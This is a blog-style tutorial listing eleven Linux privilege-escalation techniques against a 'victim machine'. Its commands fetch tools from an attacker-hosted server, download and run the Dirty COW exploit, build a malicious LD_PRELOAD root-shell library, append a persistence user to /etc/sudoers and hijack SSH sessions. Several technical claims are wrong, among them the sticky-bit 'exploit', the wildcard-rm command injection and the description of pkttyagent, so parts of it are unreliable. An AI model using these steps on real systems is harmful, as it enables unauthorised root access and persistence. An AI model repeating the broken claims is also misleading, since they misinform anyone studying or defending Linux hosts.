Introduction
Privilege escalation is the process of exploiting a vulnerability or weakness in a system or application to gain elevated privileges or access to resources that are normally restricted. In a Linux environment, there are various techniques that can be used to escalate privileges. In this article, we will explore 11 techniques for Linux privilege escalation with examples for each of them.
Linux Enumeration to escalation privileges
Enumeration is a key for every successful attack. It is a critical phase in hacking systems, and a vital part of information gathering. During this phase, we establish a connection between us and the target (locally or remotely) to gather as much information as possible to decide on an attacking vector. To enumerate a Linux host, you can use a very useful utility called LinEnum which could be downloaded from the link below:
It is a useful shell script that gathers information about a Linux host using a checklist of at least 65 items, such as kernel and sensitive users information, in order to find an escalation point.
How to use in few steps:
- Download LinEnum from github to your victim machine.
- Edit the permissions:
chmod +x LinEnum.sh - Run the script: ./LinEnum.sh
Download LinEnum from your attacker machine to victim machine:
- Download LinEnum from github to your own machine.
- Host the file on your machine which will run a local server for you on port 8000 by execeuting the following command:
python3 -m http.server - Download the file from our server:
wget <attacker ip>:8000/LinEnum.sh - Edit the permissions:
chmod +x LinEnum.sh - Run the script: ./LinEnum.sh
Below we will be discussing 11 privilege escalation techniques in details.
1- Exploiting SUID Executables
SUID (Set User ID) is a special permission that can be assigned to executable files in Linux. When an executable file with SUID permission is executed, it runs with the privileges of the user who owns the file, rather than the privileges of the user who is executing it. This can be exploited to escalate privileges.
Example:
ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 54216 Jan 3 2023 /usr/bin/passwdIn this example, the passwd binary has the SUID bit set, which means that it runs with the privileges of the root user. To exploit this, we can create a new user account with administrative privileges by modifying the passwd binary.
find / -perm -u=s -type f 2>/dev/nullThis command will list all the SUID binaries on the system.
2- Exploiting Kernel
Kernel exploits are vulnerabilities in the Linux kernel that can be exploited to escalate privileges. These vulnerabilities can be used to bypass security mechanisms and gain access to resources that are normally restricted.
Example:
The Dirty COW vulnerability one of the well-known vulnerabilities which discovered in 2016. This vulnerability allows us to gain root privileges by exploiting a race condition in the copy-on-write mechanism of the Linux kernel. To check if your system is vulnerable to Dirty COW, run the following command:
Simply run the following commands to download, compile, and execute the vulnerability exploitation.
sudo wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w /etc/passwd fooIf the command ran successfully, you should be able to read the contents of /etc/shadow.
More details about the vulnerability: https://dirtycow.ninja/
The Dirty Pipe:
The Dirty Pipe one of the well-known vulnerabilities that could be used to escalate privileges discovered in 2022. Dirty Pipe is a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes. It is similar to Dirty Cow but is easier to exploit.
Dirty Pipe exploitation: https://www.exploit-db.com/exploits/50808
You can also search for kernel vulnerabilities in few steps:
- Detect kernel version:
uname -rThis command will display the current Linux kernel version, which can be used to search for vulnerabilities that affect that version.
Then we can run the following command using searchsploit tool to search for vulnerabilities in that version of kernel:
searchsploit kernel <version>3- Exploiting Cron Jobs
Cron is a utility in Linux that allows users to schedule tasks to run automatically at specified intervals. These tasks can be executed with elevated privileges, which can be exploited to escalate privileges.
Example:
We can create a cron job that runs a malicious script with elevated privileges, which could then be used to escalate privileges if a cron job found running with a higher privilege than the actual user, a bash script for example we can add a new line to it to run our reverse shell with the privilege of the script owner.
crontab -lThis command will display the current user’s cron jobs, which can be checked for potential privilege escalation vulnerabilities.
Also check if you’ve write access to any of the following files:
/etc/init.d
/etc/cron*
/etc/crontab
/etc/cron.allow
/etc/cron.d
/etc/cron.deny
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
/etc/sudoers
/etc/exports
/etc/anacrontab
/var/spool/cron
/var/spool/cron/crontabs/root
4- Exploiting Sudo Configuration
Sudo is a utility in Linux that allows users to run commands with elevated privileges. The sudo configuration file (/etc/sudoers) can be modified to grant additional privileges to users or to allow users to run specific commands with elevated privileges.
Example:
We can modify the sudo configuration file to grant ourselves elevated privileges, or to allow us to run specific commands with elevated privileges.
sudo -lThis command will display the current user’s sudo privileges, which can be checked for potential privilege escalation vulnerabilities.
User may run the following commands on kali:
(ALL : ALL) ALL
If privilege found like result printed above that means that sudoers configuration file is misconfigured, allowing users to run any command as any user, including root. Here’s an example of how to exploit a misconfigured sudoers file:
sudo echo “zombrax ALL=(ALL:ALL) ALL” >> /etc/sudoersThis should add a user called “zombrax” to sudoers with full privliege as a root for persistence.
5- Exploiting Environment Variables
Environment variables can be used to set options for various system utilities. If a utility is running with elevated privileges and is vulnerable to environment variable injection, we can use that vulnerability to escalate privileges.
Example:
We can set the LD_PRELOAD environment variable to a malicious library that will be loaded by the program running with elevated privileges.
This could be done in few steps:
- Create a malicious shared object library, for example create a new file and call it priv_esc.c:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
void __attribute__ ((constructor)) init(void) {
setuid(0);
system("/bin/bash");
}This code sets the effective user ID to 0 (root) and then executes a Bash shell.
2. Compile the library with the following command:
gcc -fPIC -shared -o priv_esc.so priv_esc.cThis will create a shared object library named “priv_esc.so”.
Set the LD_PRELOAD environment variable to the path of our malicious library using the following command:
export LD_PRELOAD=/path/to/priv_esc.so
Run a program with elevated privileges, such as the “passwd” command:
sudo passwdCommand will execute and so our priv_esc.so malicious library, giving us a root shell.
6- Exploiting Sudo Privileges
When a non-root user has been granted sudo privileges to execute specific commands or scripts, it is important to ensure that these commands and scripts have been properly configured and secured to prevent unauthorized access or exploitation. However, in some cases, we may be able to leverage a vulnerability in one of these commands or scripts to escalate their privileges.
One common example of a vulnerability in a sudo-enabled command is the use of wildcard characters, such as *, in file or directory paths. If a command or script with sudo privileges allows the user to specify a path containing wildcard characters, we may be able to leverage this to execute arbitrary commands with elevated privileges.
For example, consider the following sudo-enabled command:
sudo rm -rf /path/to/directory/*If the user is able to specify the path to the directory, they may be able to execute arbitrary commands as the root user by specifying a path containing a wildcard character, such as:
sudo rm -rf /path/to/directory/*; whoamiThis would execute command “whoami” as a root user.
7- Exploiting Misconfigured NFS exports
If the system is using NFS (Network File System) and the administrator has misconfigured the NFS exports, we can mount the NFS share and modify files with elevated privileges. To find NFS shares that are accessible, use the following command:
showmount -e <ip_address>8- Exploiting LXD/LXC containers
LXD/LXC containers are lightweight virtualization technologies that can be used to isolate processes and applications. However, if the container is misconfigured or has vulnerabilities, we can escape the container and gain access to the host system. To find misconfigured containers, we can use tools such as LXD-PRivesc or LXD-Exploit.
Exploitation: https://github.com/initstring/lxd_root
9- Exploiting Sticky Bit
The sticky bit is a permission bit that is used to allow only the owner of a file or directory to delete or rename the file. However, if a user can create a file with the sticky bit set in a directory owned by a privileged user, they can escalate privileges. Here’s an example:
- Check for directories with sticky bit set:
find / -perm -1000 -type d 2>/dev/null2. Locate directory with weak file permissions:
find / -perm -1000 -type d -exec ls -ld {} \; | awk '{print $1,$3,$4,$NF}'3. Create file with sticky bit set in the directory:
touch /path/to/directory/file.txt; chmod +t /path/to/directory/file.txt4. Exploit sticky bit to escalate privileges:
mv /path/to/directory/file.txt /etc/sudoers9- Exploiting ZIP to escalate privileges:
ZIP privilege escalation technique takes advantage of the fact that users may have permission to read certain files but not others. It involves using the zip command to create a compressed archive of a file that the user has read access to, and then using unzip to extract the contents of the archive to stdout, thereby allowing the contents of the file to be viewed even if the user does not have direct read access to it.
Here’s how can we exploit this escalation priviliges technique by using the following commands:
LFILE=file-to-read
TF=$(mktemp -u)
zip $TF $LFILE
unzip -p $TFHere is a breakdown of the commands used in this technique:
LFILE=file-to-read: This sets the name of the file to read to the variable LFILE. This should be set to the full path of the file that the user wants to read.
TF=$(mktemp -u): This creates a temporary file name using the mktemp command and assigns it to the variable TF. The -u option tells mktemp to only print the name of the temporary file, without actually creating it.
zip $TF $LFILE: This creates a compressed archive of the file-to-read and saves it as the temporary file name created in step 2. By default, zip stores file permissions and ownership information in the archive, so this technique can be used to bypass file permissions.
unzip -p $TF: This extracts the contents of the compressed archive created in step 3 to stdout. The -p option tells unzip to send the contents of the file to stdout instead of creating a new file on disk. This allows the user to view the contents of the file even if they do not have direct read access to it.
It is important to note that this technique requires the user to have permission to execute the zip and unzip commands, and to have write access to the directory where the temporary file is created. Additionally, some systems may have restrictions in place to prevent users from using zip and unzip to bypass file permissions.
10- Exploiting pkttyagent to escalate privileges
The pkttyagent technique is a Linux privilege escalation technique that takes advantage of the pkttyagent utility which is a helper program for SSH agents. The basic idea behind this technique is that the pkttyagent utility runs as root and can be abused to execute commands as the root user.
Here are the steps to execute the pkttyagent technique:
Start by creating a new SSH key pair for your user account on the target system, if you don’t already have one. You can use the following command to create a new key pair:
ssh-keygen -t rsaNext, copy the public key to the target system using the following command:
ssh-copy-id -i ~/.ssh/id_rsa.pub <target-username>@<target-host>You will need to enter the password for the target user account when prompted.
Log into the target system using SSH and start a new SSH agent using the following command:
eval “$(ssh-agent)”Use the ssh-add command to add your SSH private key to the agent:
ssh-addOnce the key has been added to the agent, you can use the ssh-add -L command to display the public key:
ssh-add -LIn another terminal window, run the following command to exploit the pkttyagent vulnerability:
ssh -A -t user@localhost ‘sudo /usr/bin/pkttyagent /bin/bash’This command connects to the target system and launches a new instance of pkttyagent with the /bin/bash command as an argument. The -A option enables agent forwarding, while the -t option forces the creation of a TTY. The sudo command is used to execute pkttyagent as the root user.
Once you have a root shell, you can run any commands with root privileges. For example, you can use the following command to add a new user with administrative privileges:
useradd -m -s /bin/bash -G sudo newuserThis will create a new user account named newuser with a home directory and a bash shell. The -G sudo option adds the user to the sudo group, giving them administrative privileges.
That’s it! This technique can be used to escalate privileges on Linux systems that have the pkttyagent utility installed and configured for agent forwarding. It’s important to note that this vulnerability has been patched in newer versions of OpenSSH, so it may not work on all systems.
11- SSH Hijacking by ControlMaster
SSH Hijacking by ControlMaster is a privilege escalation technique that takes advantage of the ControlMaster feature in OpenSSH. ControlMaster allows multiple SSH sessions to use a single network connection, reducing overhead and improving performance. However, we can abuse this feature to hijack an existing SSH session and gain unauthorized access to the system.
This type of attack works by creating a new SSH session with ControlMaster enabled and using the same network connection as an existing SSH session. This can be accomplished by setting the ControlPath option in the SSH configuration file to the same value as the existing session. Once the new session is established, we can send commands to the victim’s terminal, and the victim will be unaware that their session has been hijacked.
To illustrate this attack, let’s assume that an attacker has already gained access to a victim’s system with a low-privileged user account. We can perform the following steps to escalate privileges using SSH Hijacking by ControlMaster:
- Identify an existing SSH session with ControlMaster enabled. This can be done by checking the output of the “ps aux | grep ssh” command for sessions with a ControlMaster socket defined in the ControlPath option.
- Copy the ControlPath value for the identified session.
- Create a new SSH session with ControlMaster enabled and use the same network connection as the existing session. This can be done by setting the ControlPath option to the copied value from step 2.
ssh -o ControlMaster=yes -o ControlPath=/path/to/copied/socket username@hostnameA breakdown of the command line:
ssh: This is the command to initiate an SSH connection.-o ControlMaster=yes: This option specifies that a ControlMaster connection should be established. Theyesvalue tells SSH to enable ControlMaster mode.-o ControlPath=/path/to/copied/socket: This option sets the path to the socket file that will be used for the ControlMaster connection. You should replace/path/to/copied/socketwith the actual path to the socket file you copied earlier.username@hostname: This specifies the remote server you want to connect to. Replaceusernamewith your actual username on the remote server andhostnamewith the actual hostname or IP address of the remote server.
4. Once the new session is established, we can send commands to the victim’s terminal, and the victim will be unaware that their session has been hijacked.
To protect against this attack, the administrator should disable the ControlMaster feature in the SSH configuration file by setting the ControlMaster option to “no”. Additionally, the administrator should monitor the system for any unexpected SSH sessions and investigate any suspicious activity.
Conclusion
In this blog post, we have discussed some of the most advanced Linux privilege escalation techniques. These techniques can be used to gain elevated privileges on Linux systems, and it is important to be aware of them in order to protect against them. By understanding these techniques, it is possible to secure Linux systems against privilege escalation attacks.
However, it is important to ensure that these techniques are used ethically and with proper authorization to avoid any legal or ethical issues.
